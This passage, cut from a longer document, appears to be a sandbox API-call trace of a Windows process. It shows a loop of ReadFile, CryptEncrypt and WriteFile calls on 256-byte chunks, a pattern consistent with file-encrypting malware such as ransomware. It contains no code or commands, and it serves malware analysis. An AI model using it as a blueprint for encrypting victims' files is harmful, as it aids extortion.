lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.041] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.041] GetLastError () returned 0x0 [0168.041] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.041] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.041] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.041] GetLastError () returned 0x0 [0168.041] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.041] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.041] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.041] GetLastError () returned 0x0 [0168.041] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.041] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.041] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.041] GetLastError () returned 0x0 [0168.041] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.041] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.041] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.041] GetLastError () returned 0x0 [0168.041] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.041] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.042] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.042] GetLastError () returned 0x0 [0168.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.042] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.042] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.042] GetLastError () returned 0x0 [0168.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.042] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.042] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.042] GetLastError () returned 0x0 [0168.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.042] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.042] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.042] GetLastError () returned 0x0 [0168.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.042] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.042] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.042] GetLastError () returned 0x0 [0168.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.042] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.042] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.042] GetLastError () returned 0x0 [0168.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.042] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.042] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.042] GetLastError () returned 0x0 [0168.042] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.043] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.043] GetLastError () returned 0x0 [0168.043] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.043] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.043] GetLastError () returned 0x0 [0168.043] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.043] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.043] GetLastError () returned 0x0 [0168.043] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.043] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.043] GetLastError () returned 0x0 [0168.043] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.043] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.043] GetLastError () returned 0x0 [0168.043] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.043] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.043] GetLastError () returned 0x0 [0168.043] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.043] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.044] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.044] GetLastError () returned 0x0 [0168.044] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.044] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.044] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.044] GetLastError () returned 0x0 [0168.044] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.044] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.044] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.044] GetLastError () returned 0x0 [0168.044] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.044] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.044] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.044] GetLastError () returned 0x0 [0168.044] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.044] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.044] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.044] GetLastError () returned 0x0 [0168.044] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.044] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.044] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.044] GetLastError () returned 0x0 [0168.044] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.044] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.044] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.044] GetLastError () returned 0x0 [0168.044] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.045] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.045] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.045] GetLastError () returned 0x0 [0168.045] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.045] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.045] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.045] GetLastError () returned 0x0 [0168.045] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.045] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.045] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.045] GetLastError () returned 0x0 [0168.045] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.045] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.045] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.045] GetLastError () returned 0x0 [0168.045] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.045] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.045] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.045] GetLastError () returned 0x0 [0168.045] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.045] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.045] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.045] GetLastError () returned 0x0 [0168.045] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.045] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.046] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.046] GetLastError () returned 0x0 [0168.046] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.046] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.046] CryptEncrypt 